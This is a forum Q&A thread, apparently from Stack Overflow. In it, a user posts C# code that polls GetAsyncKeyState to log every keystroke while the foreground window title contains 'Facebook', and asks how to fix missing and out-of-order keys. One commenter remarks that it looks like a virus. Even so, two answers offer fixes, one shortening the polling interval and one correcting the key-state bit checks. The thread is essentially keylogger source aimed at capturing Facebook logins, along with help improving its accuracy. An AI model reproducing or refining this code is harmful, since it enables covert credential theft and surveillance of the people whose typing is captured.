# GetAsyncKeyState not capturing keys in right order

Tags: c#, .net, console-application

I Have the below code which captures key strokes if the Active Window Title contains "Facebook", however, when testing... i'm not getting the exact order of keys pressed and some keys get missed... what can i do to improve upon this?

For example: if i type "ALI" i will get "AIL" Printed out

```
       [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(Int32 i);

    [DllImport("user32.dll")]
    private static extern IntPtr GetForegroundWindow();

    [DllImport("user32.dll")]
    static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);


    static void Main(string[] args)
    {

        while (true)
        {
            string WindowTitle = GetActiveWindowTitle();

            if (WindowTitle == null)
                return;

            if (WindowTitle.Contains("Facebook"))
            {
                for (int i = 0; i < 255; i++)
                {
                    int state = GetAsyncKeyState(i);

                    if (state == 1 || state == -32767)
                    {
                        Console.WriteLine((Keys)i);
                    }
                }

            }

            Thread.Sleep(1000);
        }
    }

    private static string GetActiveWindowTitle()
    {
        const int chars = 256;
        StringBuilder buff = new StringBuilder(chars);
        IntPtr handle = GetForegroundWindow();

        if (GetWindowText(handle, buff, chars) > 0)
        {
            return buff.ToString();
        }

        return null;
    }
```

Comment: Seems like you are trying to build a virus.

Answer (score 0):

Reduce interval from 1s to 5ms for starters... Thread.Sleep(5);

And even with that,when you start typing really fast,keystrokes will still get permuted and\or missing,I'm not qualified enough to explain why. Btw,your intention is way too obvious,that's why nobody wants to answer your question.

Answer (score -1):

Change these:

```
   [DllImport("user32.dll")]
    public static extern ushort GetAsyncKeyState(Int32 i);
```

and

```
if ((state & 0x0001) != 0 || (state & 0x8000) != 0 )
{
    Console.WriteLine((Keys)i);
}
```

but unsure if it is going to work?